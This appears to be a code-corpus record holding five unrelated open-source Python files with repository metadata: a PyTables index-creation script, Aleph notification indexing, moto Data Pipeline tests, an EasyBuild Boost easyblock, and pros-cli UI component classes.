rdhyee/PyTables | tables/tests/create_backcompat_indexes.py | 6 | 1209 | # -*- coding: utf-8 -*-
# Script for creating different kind of indexes in a small space as possible.
# This is intended for testing purposes.
import tables
class Descr(tables.IsDescription):
var1 = tables.StringCol(itemsize=4, shape=(), dflt='', pos=0)
var2 = tables.BoolCol(shape=(), dflt=False, pos=1)
var3 = tables.Int32Col(shape=(), dflt=0, pos=2)
var4 = tables.Float64Col(shape=(), dflt=0.0, pos=3)
# Parameters for the table and index creation
small_chunkshape = (2,)
small_blocksizes = (64, 32, 16, 8)
nrows = 43
# Create the new file
h5fname = 'indexes_2_1.h5'
h5file = tables.open_file(h5fname, 'w')
t1 = h5file.create_table(h5file.root, 'table1', Descr)
row = t1.row
for i in range(nrows):
row['var1'] = i
row['var2'] = i
row['var3'] = i
row['var4'] = i
row.append()
t1.flush()
# Do a copy of table1
t1.copy(h5file.root, 'table2')
# Create indexes of all kinds
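# (the first argument is the index optimization level, the second the index kind)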
t1.cols.var1.create_index(0, 'ultralight', _blocksizes=small_blocksizes)
t1.cols.var2.create_index(3, 'light', _blocksizes=small_blocksizes)
t1.cols.var3.create_index(6, 'medium', _blocksizes=small_blocksizes)
t1.cols.var4.create_index(9, 'full', _blocksizes=small_blocksizes)
h5file.close()
| bsd-3-clause | -919,956,977,047,702,900 | 27.785714 | 77 | 0.684864 | false |
alephdata/aleph | aleph/index/notifications.py | 1 | 1783 | import logging
from pprint import pprint # noqa
from banal import hash_data
from datetime import datetime
from followthemoney.util import get_entity_id
from aleph.index.util import index_name, index_settings, configure_index
from aleph.index.util import query_delete, index_safe
from aleph.index.util import KEYWORD
log = logging.getLogger(__name__)
def notifications_index():
return index_name("notifications", "v1")
def configure_notifications():
mapping = {
"date_detection": False,
"dynamic": False,
"properties": {
"event": KEYWORD,
"actor_id": KEYWORD,
"channels": KEYWORD,
"created_at": {"type": "date"},
"params": {"dynamic": True, "type": "object"},
},
}
index = notifications_index()
settings = index_settings(shards=3)
return configure_index(index, mapping, settings)
def index_notification(event, actor_id, params, channels, sync=False):
"""Index a notification."""
params = params or {}
data = {}
for param, value in params.items():
value = get_entity_id(value)
if value is not None:
data[param] = str(value)
channels = list(set([c for c in channels if c is not None]))
data = {
"actor_id": actor_id,
"params": data,
"event": event.name,
"channels": channels,
"created_at": datetime.utcnow(),
}
index = notifications_index()
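    # hashing the identifying fields gives a deterministic document id, so an
    # identical notification overwrites the existing document instead of duplicating it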
id_ = hash_data((actor_id, event.name, channels, params))
return index_safe(index, id_, data, sync=sync)
def delete_notifications(filter_, sync=False):
"""Delete notifications from a specific channel."""
query = {"bool": {"filter": [filter_]}}
query_delete(notifications_index(), query, sync=sync)
| mit | -4,261,842,075,724,906,500 | 29.220339 | 72 | 0.62479 | false |
Brett55/moto | tests/test_datapipeline/test_datapipeline.py | 9 | 6076 | from __future__ import unicode_literals
import boto.datapipeline
import sure # noqa
from moto import mock_datapipeline_deprecated
from moto.datapipeline.utils import remove_capitalization_of_dict_keys
def get_value_from_fields(key, fields):
for field in fields:
if field['key'] == key:
return field['stringValue']
@mock_datapipeline_deprecated
def test_create_pipeline():
conn = boto.datapipeline.connect_to_region("us-west-2")
res = conn.create_pipeline("mypipeline", "some-unique-id")
pipeline_id = res["pipelineId"]
pipeline_descriptions = conn.describe_pipelines(
[pipeline_id])["pipelineDescriptionList"]
pipeline_descriptions.should.have.length_of(1)
pipeline_description = pipeline_descriptions[0]
pipeline_description['name'].should.equal("mypipeline")
pipeline_description["pipelineId"].should.equal(pipeline_id)
fields = pipeline_description['fields']
get_value_from_fields('@pipelineState', fields).should.equal("PENDING")
get_value_from_fields('uniqueId', fields).should.equal("some-unique-id")
PIPELINE_OBJECTS = [
{
"id": "Default",
"name": "Default",
"fields": [{
"key": "workerGroup",
"stringValue": "workerGroup"
}]
},
{
"id": "Schedule",
"name": "Schedule",
"fields": [{
"key": "startDateTime",
"stringValue": "2012-12-12T00:00:00"
}, {
"key": "type",
"stringValue": "Schedule"
}, {
"key": "period",
"stringValue": "1 hour"
}, {
"key": "endDateTime",
"stringValue": "2012-12-21T18:00:00"
}]
},
{
"id": "SayHello",
"name": "SayHello",
"fields": [{
"key": "type",
"stringValue": "ShellCommandActivity"
}, {
"key": "command",
"stringValue": "echo hello"
}, {
"key": "parent",
"refValue": "Default"
}, {
"key": "schedule",
"refValue": "Schedule"
}]
}
]
@mock_datapipeline_deprecated
def test_creating_pipeline_definition():
conn = boto.datapipeline.connect_to_region("us-west-2")
res = conn.create_pipeline("mypipeline", "some-unique-id")
pipeline_id = res["pipelineId"]
conn.put_pipeline_definition(PIPELINE_OBJECTS, pipeline_id)
pipeline_definition = conn.get_pipeline_definition(pipeline_id)
pipeline_definition['pipelineObjects'].should.have.length_of(3)
default_object = pipeline_definition['pipelineObjects'][0]
default_object['name'].should.equal("Default")
default_object['id'].should.equal("Default")
default_object['fields'].should.equal([{
"key": "workerGroup",
"stringValue": "workerGroup"
}])
@mock_datapipeline_deprecated
def test_describing_pipeline_objects():
conn = boto.datapipeline.connect_to_region("us-west-2")
res = conn.create_pipeline("mypipeline", "some-unique-id")
pipeline_id = res["pipelineId"]
conn.put_pipeline_definition(PIPELINE_OBJECTS, pipeline_id)
objects = conn.describe_objects(["Schedule", "Default"], pipeline_id)[
'pipelineObjects']
objects.should.have.length_of(2)
default_object = [x for x in objects if x['id'] == 'Default'][0]
default_object['name'].should.equal("Default")
default_object['fields'].should.equal([{
"key": "workerGroup",
"stringValue": "workerGroup"
}])
@mock_datapipeline_deprecated
def test_activate_pipeline():
conn = boto.datapipeline.connect_to_region("us-west-2")
res = conn.create_pipeline("mypipeline", "some-unique-id")
pipeline_id = res["pipelineId"]
conn.activate_pipeline(pipeline_id)
pipeline_descriptions = conn.describe_pipelines(
[pipeline_id])["pipelineDescriptionList"]
pipeline_descriptions.should.have.length_of(1)
pipeline_description = pipeline_descriptions[0]
fields = pipeline_description['fields']
get_value_from_fields('@pipelineState', fields).should.equal("SCHEDULED")
@mock_datapipeline_deprecated
def test_delete_pipeline():
conn = boto.datapipeline.connect_to_region("us-west-2")
res = conn.create_pipeline("mypipeline", "some-unique-id")
pipeline_id = res["pipelineId"]
conn.delete_pipeline(pipeline_id)
response = conn.list_pipelines()
response["pipelineIdList"].should.have.length_of(0)
@mock_datapipeline_deprecated
def test_listing_pipelines():
conn = boto.datapipeline.connect_to_region("us-west-2")
res1 = conn.create_pipeline("mypipeline1", "some-unique-id1")
res2 = conn.create_pipeline("mypipeline2", "some-unique-id2")
response = conn.list_pipelines()
response["hasMoreResults"].should.be(False)
response["marker"].should.be.none
response["pipelineIdList"].should.have.length_of(2)
response["pipelineIdList"].should.contain({
"id": res1["pipelineId"],
"name": "mypipeline1",
})
response["pipelineIdList"].should.contain({
"id": res2["pipelineId"],
"name": "mypipeline2"
})
@mock_datapipeline_deprecated
def test_listing_paginated_pipelines():
conn = boto.datapipeline.connect_to_region("us-west-2")
for i in range(100):
conn.create_pipeline("mypipeline%d" % i, "some-unique-id%d" % i)
response = conn.list_pipelines()
response["hasMoreResults"].should.be(True)
response["marker"].should.equal(response["pipelineIdList"][-1]['id'])
response["pipelineIdList"].should.have.length_of(50)
# testing a helper function
def test_remove_capitalization_of_dict_keys():
result = remove_capitalization_of_dict_keys(
{
"Id": "IdValue",
"Fields": [{
"Key": "KeyValue",
"StringValue": "StringValueValue"
}]
}
)
result.should.equal({
"id": "IdValue",
"fields": [{
"key": "KeyValue",
"stringValue": "StringValueValue"
}],
})
| apache-2.0 | -3,070,338,029,501,897,000 | 28.784314 | 77 | 0.621297 | false |
JensTimmerman/easybuild-easyblocks | easybuild/easyblocks/b/boost.py | 1 | 6055 | ##
# Copyright 2009-2012 Ghent University
# Copyright 2009-2012 Stijn De Weirdt
# Copyright 2010 Dries Verdegem
# Copyright 2010-2012 Kenneth Hoste
# Copyright 2011 Pieter De Baets
# Copyright 2011-2012 Jens Timmerman
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for Boost, implemented as an easyblock
"""
import os
import shutil
import easybuild.tools.toolchain as toolchain
from easybuild.framework.easyblock import EasyBlock
from easybuild.framework.easyconfig import CUSTOM
from easybuild.tools.filetools import run_cmd
from easybuild.tools.modules import get_software_root
class EB_Boost(EasyBlock):
"""Support for building Boost."""
def __init__(self, *args, **kwargs):
"""Initialize Boost-specific variables."""
super(EB_Boost, self).__init__(*args, **kwargs)
self.objdir = None
@staticmethod
def extra_options():
"""Add extra easyconfig parameters for Boost."""
extra_vars = [('boost_mpi', [False, "Build mpi boost module (default: False)", CUSTOM])]
return EasyBlock.extra_options(extra_vars)
def configure_step(self):
"""Configure Boost build using custom tools"""
# mpi sanity check
if self.cfg['boost_mpi'] and not self.toolchain.options['usempi']:
self.log.error("When enabling building boost_mpi, also enable the 'usempi' toolchain option.")
# create build directory (Boost doesn't like being built in source dir)
try:
self.objdir = os.path.join(self.builddir, 'obj')
os.mkdir(self.objdir)
self.log.debug("Succesfully created directory %s" % self.objdir)
except OSError, err:
self.log.error("Failed to create directory %s: %s" % (self.objdir, err))
# generate config depending on compiler used
toolset = None
if self.toolchain.comp_family() == toolchain.INTELCOMP:
toolset = 'intel-linux'
elif self.toolchain.comp_family() == toolchain.GCC:
toolset = 'gcc'
else:
self.log.error("Unknown compiler used, aborting.")
cmd = "./bootstrap.sh --with-toolset=%s --prefix=%s" % (toolset, self.objdir)
run_cmd(cmd, log_all=True, simple=True)
if self.cfg['boost_mpi']:
self.toolchain.options['usempi'] = True
# configure the boost mpi module
# http://www.boost.org/doc/libs/1_47_0/doc/html/mpi/getting_started.html
# let Boost.Build know to look here for the config file
f = open('user-config.jam', 'a')
f.write("using mpi : %s ;" % os.getenv("MPICXX"))
f.close()
def build_step(self):
"""Build Boost with bjam tool."""
bjamoptions = " --prefix=%s" % self.objdir
# specify path for bzip2/zlib if module is loaded
for lib in ["bzip2", "zlib"]:
libroot = get_software_root(lib)
if libroot:
bjamoptions += " -s%s_INCLUDE=%s/include" % (lib.upper(), libroot)
bjamoptions += " -s%s_LIBPATH=%s/lib" % (lib.upper(), libroot)
if self.cfg['boost_mpi']:
self.log.info("Building boost_mpi library")
bjammpioptions = "%s --user-config=user-config.jam --with-mpi" % bjamoptions
# build mpi lib first
# let bjam know about the user-config.jam file we created in the configure step
run_cmd("./bjam %s" % bjammpioptions, log_all=True, simple=True)
# boost.mpi was built, let's 'install' it now
run_cmd("./bjam %s install" % bjammpioptions, log_all=True, simple=True)
# install remainder of boost libraries
self.log.info("Installing boost libraries")
cmd = "./bjam %s install" % bjamoptions
run_cmd(cmd, log_all=True, simple=True)
def install_step(self):
"""Install Boost by copying file to install dir."""
self.log.info("Copying %s to installation dir %s" % (self.objdir, self.installdir))
try:
for f in os.listdir(self.objdir):
src = os.path.join(self.objdir, f)
dst = os.path.join(self.installdir, f)
if os.path.isdir(src):
shutil.copytree(src, dst)
else:
shutil.copy2(src, dst)
except OSError, err:
self.log.error("Copying %s to installation dir %s failed: %s" % (self.objdir,
self.installdir,
err))
def sanity_check_step(self):
"""Custom sanity check for Boost."""
mpifs = []
if self.cfg['boost_mpi']:
mpifs = ['lib/libboost_mpi.so']
custom_paths = {
'files': mpifs + ['lib/libboost_%s.so' % x for x in ['python', 'system']],
'dirs':['include/boost']
}
super(EB_Boost, self).sanity_check_step(custom_paths=custom_paths)
| gpl-2.0 | -2,797,290,798,981,957,600 | 37.814103 | 106 | 0.606441 | false |
purduesigbots/pros-cli | pros/common/ui/interactive/components/component.py | 1 | 2612 | from typing import *
from pros.common.ui.interactive.parameters.parameter import Parameter
from pros.common.ui.interactive.parameters.validatable_parameter import ValidatableParameter
class Component(object):
"""
A Component is the basic building block of something to render to users.
Components must convey type. For backwards compatibility, Components will advertise their class hierarchy to
the renderer so that it may try to render something reasonable if the renderer hasn't implemented a handler
for the specific component class.
    For instance, DropDownComponent is a subclass of BasicParameterizedComponent, ParameterizedComponent, and finally
    Component. If a renderer has not implemented DropDownComponent, then it can render its version of a
    BasicParameterizedComponent (or ParameterizedComponent). Although a dropdown isn't rendered to the user, something
reasonable can still be displayed.
"""
@classmethod
def get_hierarchy(cls, base: type) -> Optional[List[str]]:
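        # walks base.__bases__ recursively and returns the chain of class names from
        # base down to this class; e.g. a hypothetical DropDownComponent subclass would yield
        # ['DropDownComponent', 'BasicParameterizedComponent', 'ParameterizedComponent', 'Component']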
if base == cls:
return [base.__name__]
for t in base.__bases__:
lst = cls.get_hierarchy(t)
if lst:
lst.insert(0, base.__name__)
return lst
return None
def __getstate__(self) -> Dict:
return dict(
etype=Component.get_hierarchy(self.__class__)
)
P = TypeVar('P', bound=Parameter)
class ParameterizedComponent(Component, Generic[P]):
"""
A ParameterizedComponent has a parameter which takes a value
"""
def __init__(self, parameter: P):
self.parameter = parameter
def __getstate__(self):
extra_state = {}
if isinstance(self.parameter, ValidatableParameter):
extra_state['valid'] = self.parameter.is_valid()
reason = self.parameter.is_valid_reason()
if reason:
extra_state['valid_reason'] = self.parameter.is_valid_reason()
return dict(
**super(ParameterizedComponent, self).__getstate__(),
**extra_state,
value=self.parameter.value,
uuid=self.parameter.uuid,
)
class BasicParameterizedComponent(ParameterizedComponent[P], Generic[P]):
"""
A BasicParameterComponent is a ParameterizedComponent with a label.
"""
def __init__(self, label: AnyStr, parameter: P):
super().__init__(parameter)
self.label = label
def __getstate__(self):
return dict(
**super(BasicParameterizedComponent, self).__getstate__(),
text=self.label,
)
| mpl-2.0 | -1,232,497,420,040,287,700 | 33.368421 | 114 | 0.647014 | false |